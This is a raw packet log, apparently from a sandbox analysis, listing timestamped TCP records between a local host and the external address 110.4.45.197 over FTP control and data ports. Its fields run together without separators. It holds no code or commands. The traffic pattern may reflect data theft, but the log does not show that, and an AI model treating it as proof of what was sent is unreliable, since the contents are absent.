                                                      Oct 29, 2024 02:35:33.944942951 CET5003553273192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.944983959 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.944994926 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.945003986 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.945009947 CET5003553273192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.945019007 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.945044041 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.945085049 CET5003553273192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.945086002 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.945126057 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.945163012 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.945205927 CET5003553273192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.945282936 CET5003553273192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.945319891 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.950336933 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.950383902 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.950462103 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.950478077 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.950498104 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.950594902 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.950630903 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.950680017 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.950690031 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.951044083 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.955094099 CET5003553273192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.987035990 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:34.691622972 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:34.734637022 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:44.425179958 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:44.430576086 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:44.771503925 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:44.771961927 CET5003660594192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:44.777291059 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:44.777353048 CET5003660594192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:44.777484894 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:44.782819033 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.687220097 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.687428951 CET5003660594192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:45.691236019 CET5003721192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:45.692898035 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.692908049 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.692914963 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.692923069 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.692938089 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.692946911 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.692981958 CET5003660594192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:45.693022966 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.693032026 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.693049908 CET5003660594192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:45.693089008 CET5003660594192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:45.693093061 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.693101883 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.693454027 CET5003660594192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:45.698107958 CET2150037110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.698313951 CET5003721192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:45.698390007 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.698398113 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.698430061 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.698438883 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.698446989 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.698514938 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.698518038 CET5003660594192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:45.698523045 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.698528051 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.698625088 CET5003660594192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:45.698646069 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.698654890 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.698664904 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.698685884 CET5003721192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:45.698710918 CET5003660594192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:45.698760033 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.703916073 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.704197884 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.704319000 CET2150037110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.704598904 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.704641104 CET5003721192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:45.704871893 CET6059450036110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:45.705086946 CET5003660594192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:45.735049009 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:46.467407942 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:46.515883923 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:55.392965078 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:55.398356915 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:55.423044920 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:55.428500891 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:55.428626060 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:55.739581108 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:55.740828037 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:55.746170998 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:55.746251106 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:55.746367931 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:55.751610994 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.338201046 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.338327885 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.344186068 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.677062988 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.677232981 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.677886009 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.678040028 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.682634115 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.683408022 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.683417082 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.683429956 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.683438063 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.683446884 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.683471918 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.683480024 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.683485031 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.683491945 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.683502913 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.683507919 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.683523893 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.683537006 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.683543921 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.683549881 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.683576107 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.683645964 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.687870979 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.687916994 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.688762903 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.688812017 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.688955069 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.688963890 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.688978910 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.688987017 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.688993931 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.689004898 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.689022064 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.689032078 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.689047098 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.689075947 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.689976931 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.690025091 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.690074921 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.690134048 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.690185070 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.693305016 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.694912910 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.694958925 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.695000887 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.695009947 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.695662975 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.695749044 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.696037054 CET6280650039110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:56.696074963 CET5003962806192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:56.719022989 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:57.032310963 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:57.039565086 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:57.044986963 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:57.378309011 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:57.378534079 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:57.383877039 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:57.488614082 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:57.531658888 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:57.716907024 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:57.717506886 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:57.722779989 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:58.056058884 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:58.058168888 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:58.063656092 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:58.400824070 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:58.401269913 CET5004053154192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:58.406589031 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:58.406646967 CET5004053154192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:58.406735897 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:58.411967039 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.324969053 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.327327967 CET5004053154192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:59.332830906 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.332849979 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.332926035 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.332935095 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.333020926 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.333029985 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.333070993 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.333079100 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.333082914 CET5004053154192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:59.333096981 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.333107948 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.333144903 CET5004053154192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:59.333223104 CET5004053154192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:59.338465929 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.338500977 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.338510990 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.338521957 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.338556051 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.338603020 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.338613033 CET5004053154192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:59.338653088 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.338663101 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.338680983 CET5004053154192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:59.338742018 CET5004053154192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:59.338938951 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.338998079 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.339030981 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.339050055 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.343978882 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.343997955 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.344111919 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.344167948 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.344176054 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.344604969 CET5315450040110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:59.345166922 CET5004053154192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:59.375360012 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:00.104688883 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:00.156932116 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:01.706073999 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:01.711411953 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:01.769079924 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:01.774482965 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:02.044780970 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:02.094204903 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:02.115873098 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:02.168703079 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:02.171062946 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:02.172177076 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:02.176069021 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:02.179796934 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:02.179828882 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:02.186065912 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:02.704581022 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:02.704750061 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:02.710160971 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:02.710338116 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.088249922 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.088609934 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.094209909 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.094242096 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.094273090 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.094285965 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.094300985 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.094355106 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.094358921 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.094383955 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.094389915 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.094412088 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.094430923 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.094440937 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.094469070 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.094496012 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.094496965 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.094522953 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.094527960 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.094551086 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.094589949 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.099921942 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.099951982 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.099994898 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.100002050 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.100032091 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.100033998 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.100060940 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.100063086 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.100086927 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.100092888 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.100120068 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.100125074 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.100147009 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.100191116 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.100203037 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.100271940 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.100298882 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.100445986 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.100475073 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.105499029 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.105611086 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.105694056 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.105817080 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.105894089 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.105986118 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.106034994 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.106064081 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.108772039 CET6422750042110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.108853102 CET5004264227192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.114332914 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.114522934 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.120026112 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.120057106 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.120090008 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.120090008 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.120114088 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.120136976 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.120140076 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.120165110 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.120187044 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.120193005 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.120207071 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.120237112 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.120246887 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.120265007 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.120281935 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.120292902 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.120312929 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.120332956 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.121381998 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.121429920 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.125771999 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.125799894 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.125840902 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.125855923 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.125885963 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.125915051 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.125931025 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.125946045 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.125961065 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.125972986 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.125992060 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.126017094 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.126348019 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.126399994 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.127015114 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.132715940 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.133971930 CET6360650041110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.134011984 CET5004163606192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.156536102 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.194423914 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:03.839689016 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.928092003 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:03.953444958 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:04.049911022 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:04.055489063 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:04.388629913 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:04.389070988 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:04.394567966 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:04.394646883 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:04.394699097 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:04.400116920 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:05.293621063 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:05.393290043 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.306984901 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.312634945 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.312680006 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.312711000 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.312726974 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.312769890 CET5004351358192.168.2.4110.4.45.197
